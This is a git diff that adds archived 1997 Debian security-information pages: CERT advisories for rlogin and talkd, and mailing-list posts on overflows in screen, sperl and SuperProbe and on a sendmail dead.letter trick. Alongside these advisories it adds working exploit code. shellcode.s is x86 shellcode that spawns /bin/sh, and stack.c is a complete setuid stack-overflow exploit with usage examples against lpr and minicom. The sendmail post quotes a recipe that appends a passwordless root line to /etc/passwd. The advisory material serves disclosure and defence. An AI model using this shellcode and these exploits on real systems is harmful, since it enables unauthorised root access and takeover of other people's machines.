b/english/security/info/rlogin.html @@ -0,0 +1,195 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.06.rlogin-term">CERT-Advisory</a> <p> + +The CERT Coordination Center has received reports of a vulnerability in many +implementations of the rlogin program, including eklogin and klogin. By +exploiting this vulnerability, users with access to an account on the system +can cause a buffer overflow and execute arbitrary programs as root. <p> + +The CERT/CC staff recommends installing a vendor patch for this problem +(Sec. III.A). Until you can do so, we urge you to turn off rlogin or replace +it with a wrapper (see Sec. III.B.2). <p> + +We will update this advisory as we receive additional information. +Please check advisory files regularly for updates that relate to your site. <p> + +<hr> + +<ol> +<li><b> Description</b> <p> + + The rlogin program provided by many UNIX systems, as well as some non-UNIX + systems, is described in RFC 1282. Here is an excerpt from that RFC that + describes its elemental functionality: <p> + + <em> + "The rlogin facility provides a remote-echoed, locally flow- + controlled virtual terminal with proper flushing of output. + It is widely used between Unix hosts because it provides + transport of more of the Unix terminal environment semantics + than does the Telnet protocol, and because on many Unix hosts + it can be configured not to require user entry of passwords + when connections originate from trusted hosts." + </em> <p> + + The key point from this description is that the rlogin program passes + the terminal type description from the local host to the remote host. + This functionality allows terminal-aware programs such as full-screen + text editors to operate properly across a computer-to-computer + connection created with rlogin. <p> + + To do this, the rlogin program uses the current terminal definition as + identified by the TERM environment variable. The protocol described in + RFC 1282 explains how this terminal information is transferred from the + local machine where the rlogin client program is running to the remote + machine where service is sought. <p> + + Unfortunately, many implementations of the rlogin program contain a + defect whereby the value of the TERM environment variable is copied to + an internal buffer without due care. The buffer holding the copied value + of TERM can be overflowed. In some implementations, the buffer is a local + variable, meaning that the subroutine call stack can be overwritten and + arbitrary code executed. The executed code is under the control of the + user running the rlogin program. <p> + + In addition, the rlogin program is set-user-id root. rlogin requires + these increased privileges so it can allocate a port in the required + range, as described in the in.rlogind (or rlogind) manual page: <p> + + <em> + "The server checks the client's source port. If the port is not + in the range 0-1023, the server aborts the connection." + </em> <p> + + In summary, rlogin is a set-user-id root program that in many + implementations contains a programming defect whereby an internal buffer + can be overflowed and arbitrary code can be executed as root. + +<li><b> Impact</b> <p> + + Users can become root if they have access to an account on the system. + +<li> <b>Solution</b> <p> + + Install a patch from your vendor if one is available (Section A). + Until you can take one of those actions, we recommend applying the + workaround described in Section B. + + <ol> + <li> Obtain and install a patch for this problem. <p> + + Below is a list of vendors who have provided information about + rlogin. Details are in Appendix A of this advisory; we will update + the appendix as we receive more information. If your vendor's name is + not on this list, the CERT/CC did not hear from that vendor. Please + contact your vendor directly. <p> + + Berkeley Software Design, Inc. (BSDI) <br> + Cray Research - A Silicon Graphics Company <br> + Cygnus Solutions (formerly Cygnus Support) <br> + Data General Corporation <br> + Digital Equipment Corporation <br> + FreeBSD, Inc. <br> + Hewlett-Packard Corporation <br> + IBM Corporation <br> + Linux Systems <br> + NEC Corporation <br> + NetBSD <br> + NeXT Software, Inc. <br> + The Open Group <br> + The Santa Cruz Operation (SCO) <br> + Sun Microsystems, Inc. <p> + + <li> Until you are able to install the appropriate patch, we recommend + one of the following workarounds: <p> + + <ol> + <li>Turn off rlogin. <p> + If your user community does not use rlogin, turn it off. + As root, do the following: <p> + + % chmod 0 /usr/bin/rlogin <p> + + You may find the rlogin program in some other directory on + your system. Example directories are: /bin, /usr/bin, /usr/ucb. <p> + + Note: On some systems, rlogin is provided in different forms + that do additional work. Examples are eklogin (kerberos + authentication plus encryption of the data stream) and klogin + (kerberos authentication only). These, too, need to be turned + off. <p> + + <li> Replace the rlogin program with a wrapper. <p> + We have written a prototype wrapper that is available at + + URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c</a> <p> + + The PGP signature for this file is available at + URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc</a> <p> + + To verify that this file is correct, fetch both the + rlogin_wrapper.c and rlogin_wrapper.c.asc files and check the + signature with pgp as in <p> + + % pgp rlogin_wrapper.c.asc rlogin_wrapper.c <p> + + <b>Notes:</b> + <ul> + <li> You may have to change this program to get it to compile and + work correctly on your system. + + <li> If you have different forms of rlogin, as noted in the + previous section, then you will need to replace those forms + with the wrapper as well. + </ul> + </ol> +</ol> +<hr> + +<h3>Appendix A - Vendor Information</h3> + + +Below is a list of the vendors who have provided information for this +advisory. We will update this appendix as we receive additional information. +If you do not see your vendor's name, the CERT/CC did not hear from that +vendor. Please contact the vendor directly. + + +Linux Systems <p> + + Only very out of date Linux systems are vulnerable. <p> + + Linux Netkit 0.08 has rlogin fixed. All Linux systems using older + NetKits should upgrade to NetKit 0.09. Some vendors have shipped + patched Netkit-0.08 releases. Check with your vendor for + confirmation. <p> + + NetKit 0.09 is available from: <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz">ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz</a> <p> + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/screen.html b/english/security/info/screen.html new file mode 100644 index 00000000000..b60ae8be78c --- /dev/null +++ b/english/security/info/screen.html @@ -0,0 +1,66 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Thu, 20 Feb 1997 21:23:31 -0500</b> <br> +<b>From: Khelbin <khelbin@connix.com></b> <p> + +Screen 3.07.02, when setuid root (as it usually is), is possibly to a +buffer overflow at least on certain platforms. I havn't read through all +the source but just looking quickly I noticed that attacher.c does the +following: <p> + +<pre> + struct passwd ppp; + char fullname[100]; + + strcpy(fullname, ppp->pw_gecos); +</pre> + +I was able to whip up a quick exploit but it failed to work here on BSDI +1.1 because chpass/chfn will not except certain characters. Thus, reading +in shellcode into the Ful Name field produced an error message of "Illegal +Character found in the Full Name field, re-edit [y]?" or something +similar. <p> + +Any OS or version of chfn/chpass which does not check for 'illegal +characters' or the length of the info being put into the field (BSDI 1.1 +did not check length, only for illegal characters) may be vulnerable (i +didn't check if it had given up suid root privs yet, i was going to do +that by overflowing it with my shellcode string). <p> + +If anyone can check on different platforms and get back to me, I'd be +interested. What I was doing was just putting my shellcode string into an +ENV variable (with the NOPs and ret address back to the NOPs) and echoing +the ENV variable to a file. Then just read in that file when yer in +chpass/chfn as the new gecos info. <p> + +I really didn't take much time in looking through the code and found a +possible problem so I'm sure there's more. Screen is a pretty big program +for being suid root and that old advice of not running programs you don't +need, especially suid ones, is always true. <p> + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/sendmail-dead-letter.html b/english/security/info/sendmail-dead-letter.html new file mode 100644 index 00000000000..9a7f984ea83 --- /dev/null +++ b/english/security/info/sendmail-dead-letter.html @@ -0,0 +1,83 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Tue, 25 Mar 1997 09:57:47 +0100</b> <br> +<b>From: Claude Scarpelli <claude@INFOBIOGEN.FR></b> <p> + +<pre> +In a mail dated Mar 24, bygranz@RS6000.CMP.ILSTU.EDU (Gonzo Granzeau) wrote: +> Jeffrey Moyer once rambled this: +> > On Sat, 22 Mar 1997 C0WZ1LL4@NETSPACE.ORG wrote: +> > +> > > Hello fellow mongoloids +> > > Try this: +> > > Make hard link of /etc/passwd to /var/tmp/dead.letter +> > > Telnet to port 25, send mail from some bad email address to some +> > > unreacheable hoost. +> > > Watch your message get appended to passwd. +> > > ie: +> > > cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh +> +> okay, just want to point out some things about this exploit... +> this won't work on big boxes that are partitioned cause you can only do a +> hard link on the same file system. another point is that any box that has +> a 'MAILER-DAEMON' defined will get any mail that gets sent there instead of it +</pre> + +Sometimes, sendmail can't send mail to MAILER-DAEMON. In these case, +the message is stored in /var/tmp/dead.letter. <p> + +I have seen it appear in the following configuration : + +<ol> +<li> sendmail on the best MX host is configured to refuse mail bigger + than x bytes. + +<li> sendmail on a lower priority MX host is configured as a null client + (FEATURE(nullclient)), but without the size limit. + +<li> a big mail (bigger than x bytes) arrives on the host where sendmail + is configured as a null client (the low priority MX host). <p> + +<b>Here is what happens then:</b> + +<li> the null client tries to pass the mail to the best MX, which refuse + it (bigger than x bytes) + +<li> So the null client tries to bounce back the mail to the + originator. Since it is a null client, it sends the mail to the + best MX host. + +<li> But the best MX host refuses the mail (bigger than x bytes). So the + null client tries to send a notification to MAILER-DAEMON. Since it + is a null client, it sends this mail to the best MX host, which + refuse it (bigger than x bytes). This a case where sendmail will + write to /var/tmp/dead.letter. +</ol> + +It may exist other ways for sendmail to write in /var/tmp/dead.letter. +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/shellcode.s b/english/security/info/shellcode.s new file mode 100644 index 00000000000..104b7bbe777 --- /dev/null +++ b/english/security/info/shellcode.s @@ -0,0 +1,37 @@ +.text +.globl shellcode +shellcode: +xorl %eax,%eax +movb $0x31,%al +int $0x80 +xchgl %eax,%ebx +xorl %eax,%eax +movb $0x17,%al +int $0x80 +.byte 0x68 +popl %ecx +popl %eax +jmp *%ecx +call *%esp +xorl %eax,%eax +cltd +movl %ecx,%edi +movb $'/'-1,%al +incl %eax +scasb %es:(%edi),%al +jne -3 +movl %edi,(%ecx) +movl %edx,4(%ecx) +movl %edi,%ebx +incl %eax +scasb %es:(%edi),%al +jne -3 +movb %dl,-1(%edi) +movb $0x0B,%al +int $0x80 +xorl %eax,%eax +incl %eax +xorl %ebx,%ebx +int $0x80 +.byte '/' +.string "/bin/sh0" diff --git a/english/security/info/sperl-5.003.html b/english/security/info/sperl-5.003.html new file mode 100644 index 00000000000..2fdfe6049fa --- /dev/null +++ b/english/security/info/sperl-5.003.html @@ -0,0 +1,42 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Thu, 17 Apr 1997 14:11:09 -0700</b><br> +<b>From: Murphy <jtmurphy@cray1.ecst.csuchico.edu></b><p> + +Its came to my attention that there is a buffer overflow bug in +sperl5.003 that will allow local users gain root access, if SUID root. +The exploit and bug was made and brought to my attention by <a +href="mailto:tarreau@aemiaif.ibp.fr">Willy Tarreau</a>. <p> + +<a href="sperlexp.tgz">Attached</a> is the source for the exploit. Since it requires some work to +be done to the compiled exploit (Stripping of 5 byte at the begining and +end of the binary), the precompiled Linux x86 exploit can be found +<a href="http://www.ecst.csuchico.edu/~jtmurphy/localusers.html">here</a>. <p> + +PS. Have a nice a day. +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/sperlexp.tgz b/english/security/info/sperlexp.tgz Binary files differnew file mode 100644 index 00000000000..9db1c1fba5a --- /dev/null +++ b/english/security/info/sperlexp.tgz diff --git a/english/security/info/stack.c b/english/security/info/stack.c new file mode 100644 index 00000000000..49eeaa78667 --- /dev/null +++ b/english/security/info/stack.c @@ -0,0 +1,97 @@ +/* this stack overflow exploit code was written by jsn <jason@redline.ru> */ +/* provided "as is" and without any warranty. Sun Feb 9 08:12:54 MSK 1997 */ +/* usage: argv[0] their_stack_offset buffer_size target_program [params] */ +/* generated string will be appended to the last of params. */ + +/* examples: stack -600 1303 /usr/bin/lpr "-J" */ +/* stack -640 153 /usr/bin/minicom -t vt100 -d "" */ + +#include <stdlib.h> +#include <unistd.h> +#include <stdio.h> +#include <string.h> +#include <stdarg.h> + +#define NOP 0x90 + +const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n"; + +extern code(); +void dummy( void ) +{ + extern lbl(); + + /* do "exec( "/bin/sh" ); exit(0)" */ + +__asm__( " +code: xorl %edx, %edx + pushl %edx + jmp lbl +start2: movl %esp, %ecx + popl %ebx + movb %edx, 0x7(%ebx) + xorl %eax, %eax + movb $0xB, %eax + int $0x80 + xorl %ebx, %ebx + xorl %eax, %eax + inc %eax + int $0x80 +lbl: call start2 + .string \"/bin/sh\" + "); +} + +void Fatal( int rv, const char *fmt, ... ) +{ + va_list vl; + va_start( vl, fmt ); + vfprintf( stderr, fmt, vl ); + va_end( vl ); + exit( rv ); +} + +int main( int ac, char **av ) +{ + int buff_addr; /* where our code is */ + int stack_offset = 0, + buffer_size = 0, i, code_size; + char *buffer, *p; + + buff_addr = (int)(&buff_addr); /* get the stack pointer */ + code_size = strlen( (char *)code ); /* get the size of piece of */ + /* code in dummy() */ + if( ac < 5 ) Fatal( -1, usage, *av ); + + buff_addr -= strtol( av[ 1 ], NULL, 0 ); + buffer_size = strtoul( av[ 2 ], NULL, 0 ); + + if( buffer_size < code_size + 4 ) + Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5); + /* "this is supported, but not implemented yet" ;) */ + + if( (buffer = malloc( buffer_size )) == NULL ) + Fatal( -1, "malloc(): %s\n", strerror( errno ) ); + + fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr ); + + for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 ) + *(int *)(buffer + i) = buff_addr; + memset( buffer, NOP, buffer_size/2 ); + + i = (buffer_size - code_size - 4)/2; + + memcpy( buffer + i, (char *)code, code_size ); + buffer[ buffer_size - 1 ] = '\0'; + + p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 ); + if( !p ) + Fatal( -1, "malloc(): %s\n", strerror( errno ) ); + + strcpy( p, av[ ac - 1 ] ); + strcat( p, buffer ); + av[ ac - 1 ] = p; + + execve( av[ 3 ], av + 3, NULL ); + perror( "exec():" ); +} diff --git a/english/security/info/superprobe.html b/english/security/info/superprobe.html new file mode 100644 index 00000000000..fdc0d22827e --- /dev/null +++ b/english/security/info/superprobe.html @@ -0,0 +1,96 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Tue, 4 Mar 1997 23:24:28 -0500</b> <br> +<b>From: solar@IDEAL.RU</b> <p> + +Hi! <p> + +SuperProbe is a program supplied with XFree86 (to determine the type of video +hardware installed in the machine), and it is installed setuid root in many +Linux distributions. It has already been discussed here that SuperProbe got +some buffer overflows, but there still seems to be no exploit. The reason for +this might be that the exploit has to be a bit unusual. That's why I decided +to post the exploit, as an example of exploiting an overflow without dealing +with the return address. <p> + +The overflow I'm exploiting is in the TestChip function: <p> + +<pre> + static Bool TestChip(chip_p, Chipset) + Chip_Descriptor *chip_p; + int *Chipset; + { + char *p, *p1, name[64]; + + [...] + + (void)strcpy(name, p); + } + if (StrCaseCmp(name, chip_p->name) == 0) + + [...] + + if (chip_p->f(Chipset)) + { + return(TRUE); + } + return(FALSE); + } + +</pre> + +Chip_Descriptor is defined like this: <p> + +<pre> + typedef Bool (*ProbeFunc) __STDCARGS((int *)); + +[...] + + typedef struct { + char *name; /* Chipset vendor/class name */ + ProbeFunc f; /* Probe function */ +[...] + } Chip_Descriptor; +</pre> + + +It is possible to overwrite the return address by the strcpy, but one byte of +chip_p would get zeroed out (since chip_p is located right after the return +address, and the string is ASCIIZ). This would cause the program to crash when +trying to access chip_p->name for passing it to StrCaseCmp, before the return +address is used. <p> + +That's why I overwrite chip_p to point into an environment variable (well, the +return address gets overwritten also, but it's never used), which has an array +of pointers to the shellcode (located at the end of the same variable's value) +in it. One of these is first used by StrCaseCmp, so it doesn't crash, and the +next one is used as the probe function pointer, so the shellcode gets executed +when calling chip_p->f() (it might be required to adjust the alignment in my +exploit, try values 0 to 3 if the default does't work). <p> + +<a href="probe.c">probe.c</a> +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/talkd.html b/english/security/info/talkd.html new file mode 100644 index 00000000000..c31a2979e66 --- /dev/null +++ b/english/security/info/talkd.html @@ -0,0 +1,280 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.04.talkd">CERT-Advisory</a> <p> + + +The CERT Coordination Center has received reports of a vulnerability in +talkd(8) program used by talk(1). By constructing DNS data with particular +characteristics, an intruder can remotely execute arbitrary commands with root +privileges. <p> + +An exploitation script for this problem has been made publicly available, +and we have received reports of successful root compromises involving the use +of this script. <p> + +You may be aware of advisories that have been published by other response +teams about this problem. Note that this advisory contains additional material +and covers additional aspects of the vulnerability related to a broader set of +problems of which this particular problem is only a specific instance. <p> + +The CERT/CC team recommends taking steps to solve the general problem +(Sec. III.A) and installing a vendor patch to address this particular instance +of the problem (Sec. III.B). Until you can install a patch, we urge you to +disable the talkd program(s) at your site. <p> + +We will update this advisory as we receive additional information. +Please check advisory files regularly for updates that relate to your site. <p> + +<hr> + +<ol> +<li><b> Description</b> <p> + + The CERT Coordination Center has received information of a vulnerability + in the talkd(8) program used by talk(1). talk is a communication program + that copies text from one user's terminal to that of another, possibly + remote, user. talkd is the daemon that notifies a user that someone else + wishes to initiate a talk conversation. <p> + + As part of the talk connection, talkd does a DNS lookup for the name + of the host that the connection is being initiated from. Because there + is insufficient bounds checking on the buffer where the hostname is + stored, it is possible to overwrite the internal stack space of talkd. <p> + + It is possible to force talkd to execute arbitrary commands by carefully + manipulating the hostname information. As talkd runs with root + privileges, this may allow intruders to remotely execute arbitrary + commands with these privileges. <p> + + This attack requires an intruder to be able to make a network connection + to a vulnerable talkd program and provide corrupt DNS information to that + host. <p> + + This type of attack is a particular instance of the problem described in + CERT advisory CA-96.04, "Corrupt Information from Network Servers," + available from <a href="ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers">ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers</a> <p> + + Sites that use BIND 4.9.4 Patch Level 1 or later are NOT vulnerable to + the general class of hostname/ip-address-based buffer overflow attacks + (including this specific problem). <p> + + Be aware that there are different versions of the talkd program. + Depending on your system, the program may have any of the following + names: talkd, otalkd, ntalkd. <p> + + To determine whether your site allows talk sessions, check + /etc/inetd.conf: <p> + +<pre> + # grep -i "^[a-z]*talk" /etc/inetd.conf +</pre> + + <b>Note:</b> An exploitation script for this problem has been made publicly + available. The CERT/CC has received reports of successful root + compromises involving the use of this script. + +<li><b> Impact</b> <p> + + Intruders may be able to remotely execute arbitrary commands with root + privileges. They do not need access to an account on the system to + exploit this vulnerability. + +<li><b> Solution</b> <p> + + There are several options available to avoid this problem. We recommend + that all sites defend against the general class of problem (Sec. A) and + also install a patch from your vendor (Sec. B). Until you can install a + patch, we urge you to disable the talkd program(s) at your site (Sec C). <p> + + Note that disabling the talkd program will defend against the + particular attack described in this advisory, but will not defend + against the general class of network-based attacks that manipulate + hostname/ip-address information to exploit a vulnerability. <p> + + <ol> + <li> Defend against the general class of problem <p> + + In the general case, the problem described in this advisory is one + in which the attacker uses particular hostname/ip-address data to + exploit a vulnerability. The exploitation script mentioned above + uses the specific case of DNS attacks, but attackers can use other + hostname/ip-address resolution methods, such as NIS, /etc/hosts, + and so on. <p> + + If the following measures are in place for all hostname/address + transformation techniques on your system, then your system would be + immune not only to this particular talkd exploit, but also to the + general class of hostname/ip-address-based buffer overflow attacks. <p> + + <ol> + <li> DNS-Based Attacks <p> + + To defend against a DNS-based attack, we encourage you to upgrade to + BIND 4.9.4 Patch level 1 or later (or your vendor's equivalent). The + reason is that BIND 4.9.4 Patch Level 1 conforms to the RFC (RFC 952) + defining valid hostname syntax (described in CERT advisory CA-96.04, + "Corrupt Information from Network Servers"). <p> + + Keep in mind that an upgrade to 4.9.5 may require a sendmail upgrade + because of the POSIX extensions in the latest version of BIND + (described in CA-96.04). For the latest available version of sendmail, + please consult the file + + <a href="ftp://info.cert.org/pub/latest_sw_versions/sendmail">ftp://info.cert.org/pub/latest_sw_versions/sendmail</a> <p> + + <li> Other Network Information Services <p> + + For systems that rely on additional name/address transformation + techniques (such as NIS, netinfo, and flat files like /etc/hosts), + using the recommended version of BIND may be insufficient since DNS + lookups--and therefore hostname/ip-address validation--may be bypassed + in favor of the alternative technique (NIS, netinfo, etc). Thus, we + also encourage sites and vendors to include in the suite of resolution + techniques the same code that BIND uses to validate hostnames and IP + addresses. This code is described in the next section. <p> + + <li> In-house Software <p> + + Use the hostname and IP address validation subroutines available + at the locations listed below. Include them in all programs that + use the result of the hostname lookups in any way. <p> + + <a href="ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c">ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c</a> <br> + <a href="ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c">ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c</a> <p> + + The IsValid.c file contains code for the IsValidHostname and + IsValidIPAddress subroutines. This code can be used to check host + names and IP addresses for validity according to RFCs 952 and 1123, + as well as names containing characters drawn from common practice, + namely "_" and "/". <p> + + The following files are in the directory (from the README): + + <pre> + IsValid.l The lex/flex file containing the code for + IsValidHostname and IsValidIPAddress + MD5 (IsValid.l) = 2d35040aacae4fb12906eb1b48957776 + + IsValid-raw.c The C file created by running flex + on IsValid.l + MD5 (IsValid-raw.c) = 367c77d3ef84bc63a5c23d90eeb69330 + + IsValid.c The edited file created by internalizing + variable and function definitions in + IsValid-raw.c + MD5 (IsValid.c) = ffe45f1256210aeb71691f4f7cdad27f + + IsValid.diffs The set of diffs between IsValid-raw.c + and IsValid.c + MD5 (IsValid.diffs) = 3619022cf31d735151f8e8c83cce3744 + + htest.c A main routing for testing IsValidHostname + and IsValidIPAddress + MD5 (htest.c) = 2d50b2bffb537cc4e637dd1f07a187f4 + </pre> + </ol> + + <li> Install a patch from your vendor <p> + + Below is a list of the vendors who have provided information. Details + are in Appendix A of this advisory; we will update the appendix as we + receive additional information. + + If your vendor's name is not on this list, we have not received any + information. Please contact the vendor directly. + + Berkeley Software Design, Inc. (BSDI) + Cisco Systems + Data General Corporation + FreeBSD, Inc. + Hewlett-Packard Company + IBM Corporation + Linux + NEC Corporation + The Santa Cruz Operation, Inc. (SCO) + Silicon Graphics Inc. (SGI) + Solbourne (Grumman System Support) + Sun Microsystems, Inc. + + <li> Disable the talkd program(s) <p> + + Until you can install a vendor patch, disable any talkd programs found + in /etc/inetd.conf by commenting out those lines and restarting inetd. + + Example commands executed as root: + + # grep -i talk /etc/inetd.conf + talk dgram udp wait root /usr/etc/in.talkd in.talkd + + Comment out *all* references to talkd, otalkd or ntalkd. + (Comments in /etc/inetd.conf begin with "#".) + + After editing /etc/inetd.conf, restart inetd. On many Unix systems, + this is done by sending the inetd process a HUP signal. + + For SYSV: + + # ps -ef | grep inetd | grep -v grep + # kill -HUP {inetd PID} + + For BSD: + + # ps -aux | grep inetd | grep -v grep + # kill -HUP {inetd PID} + + Note that disabling talkd will solve the specific problem discussed in + this advisory. However it will not solve the general problem of + network-based attacks that manipulate hostname/ip-address information + to exploit a vulnerability. + </ol> +</ol> + +<hr> + +<h3>Appendix A - Vendor Information</h3> + +Below is a list of the vendors who have provided information for this +advisory. We will update this appendix as we receive additional information. +If you do not see your vendor's name, please contact the vendor directly. <p> + +<b>Linux</b> <p> + + This bug was fixed in Linux NetKit 0.08 which is shipped with all reasonably + up to date Linux distributions. Linux users using NetKit 0.07 or earlier + should upgrade to NetKit 0.09. NetKit 0.09 has fixed other bugs and it is + strongly recommended Linux users upgrade from NetKit 0.08 to NetKit + 0.09. This is available from + <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz"></a> <p> + + Some vendors have opted to issue NetKit 0.08 with additional fixes rather + than 0.09. Consult your vendor for detailed information. <p> + + The Linux community would like to thank David A Holland for his continuing + work on Linux network security. <p> + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/tftpd.html b/english/security/info/tftpd.html new file mode 100644 index 00000000000..2935b63d8e3 --- /dev/null +++ b/english/security/info/tftpd.html @@ -0,0 +1,131 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Sun, 23 Mar 1997 09:11:34 -0800 (PST)</b> <br> +<b>From: Alex Belits <abelits@phobos.illtel.denver.co.us></b> <p> + +[Mod: David Holland's message added to the back, linux-alert added to the +list of addresses -- alex] <p> + +On Sat, 22 Mar 1997, Ben Cantrick wrote: + +<em> + It's a cute little hack, and it seems to work. But I am convinced that + someone must have seen the need and done this before. My extended forays + into the web via several search engines have failed to turn up anything + relevant. So I'm curious if anyone on the list knows of (or better, has) + freely distributable source for a "secure" tftpd. <p> 